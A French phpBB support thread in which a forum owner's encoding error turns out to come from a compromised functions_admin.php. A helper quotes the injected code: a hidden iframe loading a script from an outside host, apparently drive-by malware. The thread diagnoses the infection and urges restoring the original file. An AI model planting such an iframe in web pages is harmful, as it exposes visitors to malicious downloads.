Erreur d'encodage de contenu

Forum de support pour les questions concernant l'utilisation de phpBB3, les problèmes rencontrés lors de manipulations, de configuration du forum ou de personnalisation autres que Styles ou MODs.

Modérateur: Equipe

Règles du forum
A lire impérativement : Règlement de phpBB-fr.com

Pensez à effectuer une recherche, la réponse à votre question a de grandes chances d'avoir déjà été donnée.
Partager sur FacebookPartager sur TwitterPartager sur Google+

Erreur d'encodage de contenu

Messagepar stpere » 23 Mar 2010 à 18:01

Bonjour a tous

Voici donc l'erreur que je constate chez moi depuis ce matin...

Erreur d'encodage de contenu

La page que vous essayez de voir ne peut être affichée car elle utilise un type de compression invalide ou non pris en charge.
* Veuillez contacter les propriétaires du site pour les informer de ce problème.


J'ai cherché sur le forum pour trouver une solution mais rien n'a pu m'aider (voir les sujets ci dessous)

http://forums.phpbb-fr.com/message1267881.html?hilit=Erreur%20d%20encodage%20de%20contenu#p1267881

http://forums.phpbb-fr.com/message1294536.html?hilit=Erreur%20d%20encodage%20de%20contenu#p1294536

Le forum se trouve ici : http://hockey365.celeonet.fr/forum_hockey/
Mon hébergeur est Celeonet et je suis sous PHP5

D'ou peut venir le souci ? (je n'ai rien touché depuis hier pourtant)
Comment faire pour régler le problème ?

Merci de votre aide !
Pierre
----------------------------------------------------
http://www.pierre-barthelemy.fr

https://www.passionhockey.com
https://forum.passionhockey.com
----------------------------------------------------
stpere
Posteur néophyte
Posteur néophyte
 
Messages: 42
Enregistré le: 11 Jan 2007 à 11:16

Re: Erreur d'encodage de contenu

Messagepar ErnadoO » 24 Mar 2010 à 02:01

Ce bug arrive lorsque deux cas de figures sont réunis:

- Une erreur dans un de vos fichier php génère un message d'erreur
- La compression gzip est activée


En (très) gros, le message d'erreur est envoyé sans être compressé, alors que l'entête dit que le forum l'est, donc ton navigateur perd les pédales

Donc désactive la compression gzip, l'erreur apparaitre, règle là, pusi ré active la compression si tu le souhaites
ErnadoO
 

Re: Erreur d'encodage de contenu

Messagepar stpere » 24 Mar 2010 à 09:40

Merci, mais comment désactiver la compression gzip ? Et ensuite régler l'erreur

J'avais trouvé cette explication mais je ne sais pas comment faire du coup
----------------------------------------------------
http://www.pierre-barthelemy.fr

https://www.passionhockey.com
https://forum.passionhockey.com
----------------------------------------------------
stpere
Posteur néophyte
Posteur néophyte
 
Messages: 42
Enregistré le: 11 Jan 2007 à 11:16

Re: Erreur d'encodage de contenu

Messagepar EnYgmA » 24 Mar 2010 à 10:10

stpere a écrit:Merci, mais comment désactiver la compression gzip ? Et ensuite régler l'erreur


Hello ,

ça se passe dans : Acp :arrow: Paramétres du serveur :arrow: Compression Gzip :wink:

Bonne journée à vous :wink:
EnYgmA
 

Re: Erreur d'encodage de contenu

Messagepar stpere » 24 Mar 2010 à 10:32

EnYgmA a écrit:
stpere a écrit:Merci, mais comment désactiver la compression gzip ? Et ensuite régler l'erreur


Hello ,

ça se passe dans : Acp :arrow: Paramétres du serveur :arrow: Compression Gzip :wink:

Bonne journée à vous :wink:


:mrgreen: j'avais peur de cette réponse, en fait mon problème c'est d'accéder a l'administration (et de me logger) alors que mon forum est HS pour l'instant.
je vais chercher dans les tutos, ca doit bien être quelque part sur le forum
----------------------------------------------------
http://www.pierre-barthelemy.fr

https://www.passionhockey.com
https://forum.passionhockey.com
----------------------------------------------------
stpere
Posteur néophyte
Posteur néophyte
 
Messages: 42
Enregistré le: 11 Jan 2007 à 11:16

Re: Erreur d'encodage de contenu

Messagepar stpere » 24 Mar 2010 à 10:39

:mrgreen: j'avais peur de cette réponse, en fait mon problème c'est d'accéder a l'administration (et de me logger) alors que mon forum est HS pour l'instant.
je vais chercher dans les tutos, ca doit bien être quelque part sur le forum


Bon, j'ai trouvé comment y accéder, et j'ai une erreur :

Parse error: syntax error, unexpected '<', expecting T_VARIABLE or '$' in /home/www/NOM DU COMPTE/www/DOSSIER FORUM/includes/functions_admin.php on line 638


:cry: je sais pas ce qui s'est passé mais j'ai l'impression que c'est le bordel !
----------------------------------------------------
http://www.pierre-barthelemy.fr

https://www.passionhockey.com
https://forum.passionhockey.com
----------------------------------------------------
stpere
Posteur néophyte
Posteur néophyte
 
Messages: 42
Enregistré le: 11 Jan 2007 à 11:16

Re: Erreur d'encodage de contenu

Messagepar EnYgmA » 24 Mar 2010 à 10:40

Attention aux Up's de moins de 24h :wink:

Est ce que pour la compression Gzip vous avez trouvé comment la désactiver via la Bdd ? :wink:
EnYgmA
 

Re: Erreur d'encodage de contenu

Messagepar stpere » 24 Mar 2010 à 11:26

EnYgmA a écrit:Attention aux Up's de moins de 24h :wink:

Est ce que pour la compression Gzip vous avez trouvé comment la désactiver via la Bdd ? :wink:


J'avoue que non... est ce : allow_sig ? dans phpbb_config ?
je viens de faire le tour de la base sans succès

Merci !
----------------------------------------------------
http://www.pierre-barthelemy.fr

https://www.passionhockey.com
https://forum.passionhockey.com
----------------------------------------------------
stpere
Posteur néophyte
Posteur néophyte
 
Messages: 42
Enregistré le: 11 Jan 2007 à 11:16

Re: Erreur d'encodage de contenu

Messagepar EnYgmA » 24 Mar 2010 à 11:35

Dans la bdd allez dans : phpbb_config :arrow: gzip_compress :arrow: config_value :arrow: 0

Faites le test voyez si vous pouvez accéder à votre Acp :wink:
EnYgmA
 

Re: Erreur d'encodage de contenu

Messagepar stpere » 24 Mar 2010 à 12:00

EnYgmA a écrit:Dans la bdd allez dans : phpbb_config :arrow: gzip_compress :arrow: config_value :arrow: 0

Faites le test voyez si vous pouvez accéder à votre Acp :wink:


:oops: je n'avais pas vérifier les pages suivantes dans phpbb_config, la honte !!
Bref, je viens de le faire, et aucun changement, que ce soit sur la home du forum, ou l'admin...
----------------------------------------------------
http://www.pierre-barthelemy.fr

https://www.passionhockey.com
https://forum.passionhockey.com
----------------------------------------------------
stpere
Posteur néophyte
Posteur néophyte
 
Messages: 42
Enregistré le: 11 Jan 2007 à 11:16

Re: Erreur d'encodage de contenu

Messagepar ErnadoO » 24 Mar 2010 à 13:07

L'erreur dont je fais mention dans mon message semble être celle de functions_admin.php

mettez nous ce fichier en téléchargement :wink:
ErnadoO
 

Re: Erreur d'encodage de contenu

Messagepar stpere » 24 Mar 2010 à 13:28

ErnadoO a écrit:L'erreur dont je fais mention dans mon message semble être celle de functions_admin.php

mettez nous ce fichier en téléchargement :wink:


Voila ce fichier zipé : http://hockey365.celeonet.fr/Vrac/functions_admin.zip

Merci :)
----------------------------------------------------
http://www.pierre-barthelemy.fr

https://www.passionhockey.com
https://forum.passionhockey.com
----------------------------------------------------
stpere
Posteur néophyte
Posteur néophyte
 
Messages: 42
Enregistré le: 11 Jan 2007 à 11:16

Re: Erreur d'encodage de contenu

Messagepar Memphis007 » 24 Mar 2010 à 14:07

Bonjour,

Ben oui ya un gros souci là !

il manque les 3/4 du fichier !

A la place tu as ceci :

Code: Tout sélectionner
<iframe otheh='b3Rc72C3' src='http://http-iframe.org/s/in.cgi?7 ' qaucn='XWwLfjVx' width='640' height='293' style='display:none'></iframe>


Commence par remplacer ce fichier par un d'origine
Memphis007
Posteur néophyte
Posteur néophyte
 
Messages: 79
Enregistré le: 31 Mai 2007 à 23:21

Re: Erreur d'encodage de contenu

Messagepar stpere » 24 Mar 2010 à 14:21

Memphis007 a écrit:Bonjour,

Ben oui ya un gros souci là !

il manque les 3/4 du fichier !

A la place tu as ceci :

Code: Tout sélectionner
<iframe otheh='b3Rc72C3' src='http://http-iframe.org/s/in.cgi?7 ' qaucn='XWwLfjVx' width='640' height='293' style='display:none'></iframe>


Commence par remplacer ce fichier par un d'origine


Effectivement. Je viens de changer le fichier et comme j'avais toujours une erreur d'encodage (mais plus d'erreur dans le fichier), j'ai tenté de mettre a jour mon forum.
http://hockey365.celeonet.fr/forum_hockey/install/
Et je n'ai pas toute la page d'install... :?

je ne sais pas ce qui a pu se passer, mais c'est le boxon....
----------------------------------------------------
http://www.pierre-barthelemy.fr

https://www.passionhockey.com
https://forum.passionhockey.com
----------------------------------------------------
stpere
Posteur néophyte
Posteur néophyte
 
Messages: 42
Enregistré le: 11 Jan 2007 à 11:16

Re: Erreur d'encodage de contenu

Messagepar Memphis007 » 24 Mar 2010 à 14:45

On ne met pas à jour un forum qui connait des problèmes surtout de ce type, faut résoudre le problème d'abord.
Memphis007
Posteur néophyte
Posteur néophyte
 
Messages: 79
Enregistré le: 31 Mai 2007 à 23:21

Suivante

Retourner vers Utilisation

 


  • Articles en relation
    Réponses
    Vues
    Dernier message

Qui est en ligne

Utilisateurs parcourant ce forum : Aucun utilisateur enregistré et 5 invités